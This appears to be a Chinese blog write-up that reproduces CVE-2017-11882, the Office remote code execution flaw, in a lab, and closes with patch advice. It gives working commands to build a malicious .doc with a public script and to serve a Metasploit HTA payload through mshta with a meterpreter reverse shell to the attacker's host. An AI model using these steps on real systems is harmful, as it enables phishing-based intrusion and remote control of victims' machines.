1. 程式人生 > >CVE-2017-11882復現-office命令執行

CVE-2017-11882復現-office命令執行

同時 黑客攻擊 註意 asc cati 保存 bsp close misc

0x01 前言

11月14日,微軟按照慣例發布了11月的安全更新,隨後不久,安全公司EMBEDI在官方博客上公開了其向微軟提交的編號為CVE-2017-11882的Office遠程代碼執行漏洞:

https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about

講述了他們如何發現這個漏洞的過程,並揭露了該漏洞的部分技術細節,不過沒有公開漏洞驗證代碼(PoC)。

我們根據EMBEDI的這篇報告,並結合自身的分析,第一時間構造出了可以彈出計算器的PoC,並得出結論:該漏洞的利用代碼非常簡單而且穩定,極易用於黑客攻擊,特別是釣魚郵件攻擊:利用漏洞可以很容易構造出包括惡意代碼的Office文檔,點擊後無需任何用戶交互就可以遠程執行任意代碼。同時,漏洞影響所有的Microsoft Office版本以及Office 365。意識到問題的嚴重性之後,我們發布了CVE-2017-11882的第一次預警通告。

0x02 測試環境

攻擊機:kali2.0 ip:192.168.42.162
受害機:win7 office2007

  使用 Ridter 師傅改進過的腳本:

https://github.com/Ridter/CVE-2017-11882/

生成漏洞 doc 文件,首先簡單的測試一下是否能夠彈出計算器,命令如下:

python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

技術分享圖片

既然能夠實現彈出,那我們可以構造執行 powershell 直接獲取 msf 會話

0x03 深入利用

在利用前需要了解下什麽是hta,HTA是HTML Application的縮寫(HTML應用程序),是軟件開發的新概念,直接將HTML保存成HTA的格式,就是一個獨立的應用軟件,與VB、C++等程序語言所設計的軟件界面沒什麽差別。它的程序碼可以像 HTML 一樣被編輯和檢查。在 hta 文件中 VBScript 和 JavaScript 的程序碼可以任意混合。HTA 雖然用 HTML、JS 和 CSS 編寫,卻比普通網頁權限大得多。它具有桌面程序的所有權限(讀寫文件、操作註冊表等)。hta 本來就是被設計為桌面程序的。

1.利用msf生成powershell 的利用腳本

選擇利用模塊,設置下路徑

use exploit/windows/misc/hta_server
set URIPATH test

技術分享圖片

選擇監聽模塊,設置下本機ip,運行

set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.162
exploit

技術分享圖片

技術分享圖片

這裏使用的是 43 字符限制的腳本 ( github 上還有 109 字符限制的腳本),命令長度有 43 字符的限制,可以使用 URIPATH 設置路徑,盡量短一點,避免加起來超過 43 字符,這裏生成的代碼 payload 是:

mshta.exe http://192.168.42.162:8080/test

2.使用腳本生成漏洞doc文件,代碼如下:

python Command43b_CVE-2017-11882.py -c "mshta.exe http://192.168.42.162:8080/test" -o exp.doc

測試機打開 doc 文件後就會通過 mshta 去執行鏈接中的 hta 嵌套的 VBS 代碼,從而執行 powershell 命令,隨便用一個瀏覽器打開鏈接,就可以下載到 test.hta,文件內容如下:

技術分享圖片

3、測試機打開文件後,攻擊機就會獲取到 msf 會話。

技術分享圖片

現在我們已經獲取到了win7的shell,這裏要註意下,因為我們這裏結合了powershell來獲取msf的回話,然而xp系統上默認沒有powershell,所以在xp上需要先安裝powershell才能得到回話。下載powershell通過命令執行也可以下載安裝,詳情請百度下,這裏就不過多的累贅了。

0x04 修復方案

目前微軟公司已經發布了安全補丁下載微軟對此漏洞補丁:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

大家可以安裝補丁修復該漏洞並開啟自動更新功能,另外大部分殺軟已經采取了防禦措施,經測試部分殺軟直接把 mshta、rundll32、powershell 執行的命令都會做相關攔截,並提示給用戶這是惡意操作。

技術分享圖片

CVE-2017-11882復現-office命令執行